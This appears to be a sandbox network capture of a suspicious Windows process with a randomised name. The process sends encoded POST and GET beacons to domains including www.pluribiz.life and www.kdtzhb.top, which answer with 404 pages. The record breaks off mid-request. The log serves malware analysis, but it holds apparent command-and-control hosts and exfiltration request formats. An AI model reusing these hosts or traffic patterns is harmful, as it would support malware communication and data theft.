Nov 6, 2024 16:00:29.261351109 CET | 1236 | IN | Data Raw: 41 44 71 43 41 4d 41 41 41 43 72 78 6a 68 64 41 41 41 41 74 31 42 4d 56 45 55 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                        Data Ascii: ADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////5+fn////////////////////////////////6+vr/////////////
Nov 6, 2024 16:00:29.261363983 CET | 1236 | IN | Data Raw: 30 53 6f 2b 68 57 6d 69 36 31 4e 6e 33 61 71 4b 47 45 7a 44 66 46 72 6d 45 6f 4b 71 63 57 53 46 44 52 4f 4e 53 72 41 55 30 69 46 59 4c 72 48 55 32 52 4b 42 33 71 2b 48 78 44 48 54 34 4a 4b 45 65 32 70 72 68 78 59 31 61 43 53 35 6c 59 2b 48 6e 58
                                                                                        Data Ascii: 0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT4JKEe2prhxY1aCS5lY+HnXu6N+x6IJCRQQmEEz+YjIE/xs/MmD8qHRYK5CAHuaTY5jfQxFC/YoIQSSVafrD+WK4H0Piv8SATRZChEXiOs39L/IYwiOxRHgeEKcmbMI9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7
Nov 6, 2024 16:00:29.261375904 CET | 424 | IN | Data Raw: 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 42 47 52 77 37 61 64 31 5a 45 2b 41 56 48 37 34 58 68 38 4e 51 4d 2f 64 5a 4d 78 56 4b 44 6b 50 43 79 57 6d 62 50 4a 2f 38 75 49 51 4a 2f 58 62 69 4c 38 62 4e 4b 76 76 30 76 57 6c 4c
                                                                                        Data Ascii: 1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGXIAX3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjn
Nov 6, 2024 16:00:29.261457920 CET | 1236 | IN | Data Raw: 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32
                                                                                        Data Ascii: URFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGX
Nov 6, 2024 16:00:29.261471987 CET | 1236 | IN | Data Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                        Data Ascii: } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code"
Nov 6, 2024 16:00:29.266565084 CET | 619 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_sourc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49721 | 209.74.64.58 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:00:34.495141983 CET | 636 | OUT | POST /afcr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Cache-Control: max-age=0
Connection: close
Host: www.pluribiz.life
Origin: http://www.pluribiz.life
Referer: http://www.pluribiz.life/afcr/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 79 4c 6d 6b 66 6a 73 6e 36 36 59 43 4c 69 57 68 64 50 66 4a 69 66 59 55 47 48 49 59 4b 46 55 69 4f 37 42 47 34 63 3d
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fyLmkfjsn66YCLiWhdPfJifYUGHIYKFUiO7BG4c=
Nov 6, 2024 16:00:35.159296989 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 15:00:35 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         14 | 192.168.2.8 | 49722 | 209.74.64.58 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:37.062380075 CET | 656 | OUT | POST /afcr/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        Origin: http://www.pluribiz.life
                                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 33 7a 55 46 76 2b 64 39 59 38 34 74 72 78 59 76 4a 51 67 4e 35 52 57 57 71 5a 43 72 30 75 30 6f 4c 6b 48 73 50 68
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi3zUFv+d9Y84trxYvJQgN5RWWqZCr0u0oLkHsPh
                                                                                         Nov 6, 2024 16:00:37.707505941 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:37 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         15 | 192.168.2.8 | 49723 | 209.74.64.58 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:39.699631929 CET | 1673 | OUT | POST /afcr/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        Origin: http://www.pluribiz.life
                                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2b 7a 2b 64 42 48 6c 53 32 4c 4b 57 4d 78 63 2b 4d 33 31 53 64 56 7a 6e 4c 39 34 41 51 32 46 4b 35 56 31 33 75 33 2b 4e 62 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 42 5a 46 51 39 4d 44 38 7a 53 6a 49 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 4a 65 2f [TRUNCATED]
                                                                                        Data Ascii: A60d=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psiLL5C9u+z+dBHlS2LKWMxc+M31SdVznL94AQ2FK5V13u3+Nb+S2UTQcWuf6ERpiHbzmaWDeZwRlH50HiL9VygPCOiWTZofs3DW1thNPWdwbhwaBZFQ9MD8zSjIdYIKBS92eCrPbNmx/F/KIOhaTE/1SQ1x9wY02dJe/nuLHaWilGqd+SbLUthSIle0H0oCLrQP3D/EbDEpilBjhgYH+BTTyAOxaV9f5qrwtI69BCg9sqpCf10C/Tb+g1NDtGWPv18KZ6t0FDU/0+yxQsPhsta0fVg05fwVtfVuc4flW0e93idYYWmakLHucFptaGDM2VQap40rNjdoUK9q1byuK0vZgnSSpV44pOTUiLq3gUyoN498y7F8n1bL9/HOKbs2+7moBUv52r4/rqHYLvoETSyPZlli5c+FDHRi36EgGya4QtTqpJX273psGzRAa1ngERkZ/+bHX9hxhtiDR0KEND8ZIWG9nZzVjvrlpZWULnbD1s46O9H6hSnkkGceEty65RTEiyHk60oQcJLfHPZtmHka6IDZTmuTmfSUPKZy0jxT7PEy4vYh9ZG1dg9lsrCO7HXadWiS+DB2tKpeJPhE2Fnct2SVgec2GVX0t0SCnN2Ma8vXBvjtAqjAEABmeY/Jm9xUUz6Ap37zZMUiSjuHe0g/aJxiJEeONkQSsjvVy82pnDmp7knGs1jIGeB5wjMFW1A01Bbl7pWkIMG45a6YVYCNgJm+6pWF8cLnPlF32SN5ZNLoMK5BQH72xuHqm6TvE5FqHr7BRLGxe/Kn1BEvtjFzKGUOFfNM3cbQDe8PXUtyotjDQBje1AhfDXvUlCiCfEfG+1X [TRUNCATED]
                                                                                         Nov 6, 2024 16:00:40.305983067 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:40 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         16 | 192.168.2.8 | 49724 | 209.74.64.58 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:42.233305931 CET | 379 | OUT | GET /afcr/?QftlZ=CnaPg8j&A60d=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ACfrzzZPLOA7u6erlXN+FNsi+iqdwi1J/UOdsVhZq9rVpg== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.pluribiz.life
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                         Nov 6, 2024 16:00:42.892618895 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:00:42 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         17 | 192.168.2.8 | 49725 | 47.242.89.146 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:48.385265112 CET | 627 | OUT | POST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 38 72 71 41 6e 50 4d 65 30 53 74 67 69 59 43 70 39 46 70 4a 54 56 75 2b 57 69 53 33 76 4e 38 44 2b 6c 43 67 58 30 3d
                                                                                        Data Ascii: A60d=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcY8rqAnPMe0StgiYCp9FpJTVu+WiS3vN8D+lCgX0=
                                                                                         Nov 6, 2024 16:00:49.338651896 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:49 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         18 | 192.168.2.8 | 49726 | 47.242.89.146 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:00:51.101100922 CET | 647 | OUT | POST /1iqa/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.kdtzhb.top
                                                                                        Origin: http://www.kdtzhb.top
                                                                                        Referer: http://www.kdtzhb.top/1iqa/
